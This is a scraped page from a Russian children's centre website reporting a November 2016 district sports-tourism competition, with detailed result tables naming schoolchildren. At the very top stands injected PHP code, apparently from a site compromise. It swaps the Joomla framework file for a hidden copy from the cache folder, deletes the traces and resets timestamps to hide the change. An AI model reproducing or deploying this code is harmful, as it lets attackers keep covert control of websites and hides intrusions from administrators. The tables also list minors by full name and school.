$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Открытые районные соревнования по спортивному туризму
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы иметь возможность оставлять комментарии и скачивать фотографии из нашей "ФОТОГАЛЕРЕИ".



Спасибо за регистрацию.

План мероприятий

Сентябрь 2017
Пн Вт Ср Чт Пт Сб Вс
28 29 30 31 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 1
Developed by JoomVision.com
Баннер

Открытые районные соревнования по спортивному туризму PDF Печать E-mail

   1 ноября в Платовской школе традиционно начался осенне-зимний период соревнований по спортивному туризму на имитационной дистанции 1,2 и 3 класса, в которых принимали участие более 70 учащихся из 8 школ района: Герасимовки, Кулагино, Рыбкино, Новосергиевки, Красной Поляны и Платовки.

    На этих соревнованиях была впервые поставлена дистанция 3 класса сложности, где участники проходили вертикальные участки подъема и спуска, а также подъем и спуск по наклонной навесной переправе. Также был добавлен небольшой вертикальный участок на дистанции 1 класса. Все это не вызвало особых затруднений у участников. Ребята с удовольствием проходили новые этапы. Также была поставлена дистанция по велосипедному туризму 1,2 и 3 класса, где ребята показывали навыки фигурного вождения велосипеда. Судьями на этих соревнованиях снова работали старшеклассники Платовской и Кулагинской школ, а также свою помощь предложили педагоги, приехавшие на соревнования и родители, которые пришли посмотреть на своих детей. По итогам соревнований места распределились следующим образом:

 

 

Сводный протокол

 

Лично-командная пешеходная дистанция 3 класса

 

Команда

Фамилия, имя

Общее время

Штрафное время (1б-10сек)

Результат

Место

Время

Место

Платовская СОШ

Агаршева Наталья

3.25

0.30

3.55

Ш

9.21

I

Павлов Данил

1.22

-

1.22

I

Кабанова Анастасия

1.44

-

1.44

I

Хасанова Анастасия

2.20

-

2.20

II

Лично

Самойлова Дарья

6.10

-

6.10

6

   

Герасимовская СОШ

Бражкин Анатолий

5.08

-

5.08

III

   

Гайсин Шамиль

6.05

0.30

6.35

4

Родина Наталья

6.30

0.30

7.00

7

Белоклокова Анастасия

3.58

0.30

4.28

4

Кулагинская СОШ

Кузьмин Рамиль

3.42

0.30

4.12

II

15.01

III

Кузьмин Рамиль

3.42

0.30

4.12

II

Шипилов Сергей

4.43

0.30

5.13

4

Илюкина Юлия

снята

   

cнята

Мананникова Полина

5.36

-

5.36

5

 

 

 

Лично-командная пешеходная дистанция 2 класса

Команда

Фамилия, имя

Общее время

Штрафное время (1б-10сек)

Результат

Место

Время

Место

Платовская СОШ

Кубасов Влад

5.15

0.10

5.25

9

22.03

II

Косолапов Алексей

5.13

0.10

5.23

8

Рыжков Кирилл

5.03

0.10

5.13

7

Уразаева Злата

6.02

-

6.02

III

Кулагинская СОШ

Пятин Саша

4.20

0.10

4.30

III

18.25

I

Левцов Кирилл

4.19

0.50

5.09

6

Мананников Сергей

4.19

0.10

4.29

II

Пятина Лена

3.57

0.20

4.17

I

Рыбкинская

СОШ-1

Атаков Иван

4.40

-

5.25

9

24.21

III

Козин Николай

4.11

0.20

4.31

4

Рахманин Вова

5.25

2.10

7.35

14

Бутыркина Анна

6.10

0.40

6.50

4

Герасимовская СОШ

Барабанщиков Максим

10.19

1.10

11.29

17

33.56

5

Авдонина Дарья

6.47

0.10

6.57

5

Девлемова Ксения

5.00

-

5.00

II

Титоренко Ангелина

10.30

-

10.30

6

Барабановская СОШ

Логин Данил

6.35

-

6.35

11

26.19

4

Гренц Данил

4.53

1.50

6.43

12

Карташов Данил

5.17

0.20

5.37

10

Суров Саша

7.04

-

7.04

13

Лично

Рыбкинская

Щукин Алексей

4.10

0.40

4.50

5

   

Севрин Дима

3.22

0.40

4.02

I

 

Ахметов Руслан

9.07

1.20

10.27

16

 

Хуторская

Громовой Сергей

9.15

-

9.15

15

 

Платовская

Тюков Богдан

8.50

4.10

13.00

16

 

Герасимовская

Панфилкина Валерия

17.00

0.10

17.10

7

 


 

Лично-командная пешеходная дистанция 1 класса 

Команда

Фамилия, имя

Общее время

Штрафное время (1б-10сек)

Результат

Место

Время

Место

Герасимовская СОШ

Шурыгин Кирилл

3.03

-

3.03

II

14.26

I

Бражкина Ульяна

3.30

0.20

3.50

5

Сергеева Мария

1.30

-

1.30

I

Сергеева Ульяна

5.33

0.30

6.03

11

Рыбкинская СОШ

Рахманина Наташа

4.07

0.30

4.37

8

22.12

Ш

Щукина Полина

7.01

0.30

7.31

15

Севрин Иван

6.37

-

6.37

10

Щукин Алексей

3.27

-

3.27

III

Кулагинская

СОШ

Никитин Данил

2.51

-

2.51

I

14.27

II

Куликова Снежанна

3.53

-

3.53

6

Таркина Дарья

5.00

-

5.00

10

Добрынина Елизавета

2.53

-

2.53

III

Сузаново-1

Ижока Андрей

2.57

0.40

3.37

4

22.15

4

Тишанбаева Анна

5.01

1.40

6.41

12

Шиктыбаев Айдар

4.33

0.30

5.03

7

Тишанбаева Таня

5.14

1.40

6.54

13

Сузаново-2

Бикеева Катя

5.28

1.40

7.08

14

23.49

5

Раманенкова Лида

4.40

-

4.40

9

Поздняков Сергей

4.35

-

4.35

6

Аноха Леонид

6.46

0.40

7.26

11

Личники

Сузановская СОШ

Смирнова Анна

3.05

0.30

3.35

4

   

Назаров Анатолий

5.30

-

5.30

9

 

Барабановская СОШ

Жанаев Айрат

4.47

0.40

5.27

8

 

Манасов Руслан

3.24

0.40

4.09

5

 

Кулагинская СОШ

Лупандина Лера

3.58

-

3.58

7

 

Лупандина Анна

2.08

0.10

2.18

II

 

Рыбкинская СОШ

Щукин Алексей

3.27

-

3.27

4

 


 

Фигурное вождение велосипеда дистанция 2 класса

 

Команда

Фамилия, имя

Общее время

Штрафное время (1б-10сек)

Результат

Место

Время

Место

Платовская

СОШ-1

Агаршева Наталья

1.07

0.45

1.52

11

4.18

I

Павлов Данил

0.46

0.5

0.51

II

Кабанова Анастасия

0.48

-

0.48

II

Хасанова Анастасия

0.47

-

0.47

I

Герасимовская

СОШ-1

Бражкин Толик

0.42

-

0.42

I

7.53

6

Гайсин Шамиль

0.51

0.35

1.26

17

Родина Наталья

1.00

0.40

1.40

8

Белоклокова Анастасия

1.30

1.35

3.05

19

Герасимовская

СОШ-2

Бражкина Ульяна

1.21

1.25

2.46

14

11.07

9

Сергеева Ульяна

1.34

1.25

2.59

17

Сергеева Мария

1.23

1.35

2.58

16

Шурыгин Кирилл

1.04

1.20

2.24

22

Кулагинская

СОШ-1

Пятина Елена

1.01

0.55

1.56

12

8.18

7

Мананников Сергей

1.01

0.15

1.16

12

Пятин Саша

1.12

2.50

4.02

26

Левцов Кирилл

0.59

0.5

1.04

10

Платовская

СОШ-2

Кубасов Влад

0.52

0.10

1.02

7

5.39

Ш

Косолапов Алексей

0.53

0.30

1.23

16

Рыжков Кирилл

0.56

0.30

1.26

17

Уразаева

Злата

0.58

0.50

1.48

10

Кулагинская

СОШ-2

Никитин Данил

1.28

1.40

3.08

25

13.00

11

Таркина Даша

1.10

1.50

3.00

18

Куликова Снежанна

1.19

2.55

4.14

23

Добрынина Елизавета

1.13

1.25

2.38

13

Рыбкинская

СОШ-1

Атаков Иван

0.55

-

0.55

III

4.33

II

Козин Николай

0.56

-

0.56

4

Рахманин Вова

0.56

0.5

1.01

6

Бутыркина Анна

1.06

0.35

1.41

9

Рыбкинская

СОШ-2

Щукина Полина

1.11

0.10

1.21

5

5.48

4

Щукин Алексей

1.15

0.25

1.40

19

Севрин Иван

1.02

0.20

1.22

15

Рахманина Наташа

1.15

0.10

1.25

6

Герасимовская СОШ-3

Барабанщиков Максим

1.12

0.15

1.27

18

6.39

5

Авдонина Дарья

1.18

1.35

2.53

15

Девлемова Ксения

0.49

-

0.49

Ш

Титоренко Ангелина

1.05

0.25

1.30

7

Барабановская

СОШ

Логин Данил

1.00

1.25

2.25

23

8.45

8

Гренц Данил

0.46

1.25

2.06

21

Карташов Данил

0.56

0.10

1.06

11

Суров Саша

1.28

1.40

3.08

25

Сузановская СОШ-1

Ижока Андрей

1.18

1.25

2.53

15

13.06

12

Тишанбаева Анна

1.15

0.55

2.10

13

Тишанаева Таня

1.15

0.10

1.25

6

Шиктыбаев Айрат

2.03

4.35

6.38

28

Сузановская СОШ-2

Поздняков Сергей

1.02

0.15

1.17

13

13.43

13

Аноха Леонид

1.20

2.55

4.15

27

Бикеева Катя

1.34

3.05

4.39

25

Романенкова Лида

1.22

2.10

3.32

21

Сузановская СОШ-3

Ижока Вика

1.30

2.50

4.20

24

11.35

10

Багров Дима

1.01

0.25

1.26

17

Назаров Анатолий

1.06

1.50

2.56

24

Смирнова Анна

1.18

1.35

2.53

15

Личники

Кулагинская

СОШ

Лупандина Катя

1.49

4.10

5.59

26

   

Лупандина Лера

1.28

1.25

4.02

22

 

Ахметов Руслан

0.56

0.10

1.06

10

   

Хуторская СОШ

Громовой Сергей

0.54

1.00

1.54

20

   

Мастагалеев Максим

1.11

0.10

1.21

14

Платовская СОШ

Тюков Богдан

0.46

0.35

1.21

14

   

Герасимовская СОШ

Панфилкина Валерия

1.02

0.15

1.17

4

   

Барабановская СОШ

Манасов Руслан

0.58

-

0.58

5

   

Жанаев Айрат

0.53

0.10

1.03

8

   


 

 

Гл.судья : / __________ / Н.В.Смолина, инструктор д.ю.туризма, судья II кат.

 

 

Cекретарь : __________ / М.В.Ручкин, судья II кат./                «_01_»  11._2016г.

 


img_20161101_130005

 


img_20161101_120625

 

img_20161101_121426

 

Назад

Обновлено 11.11.2016 18:42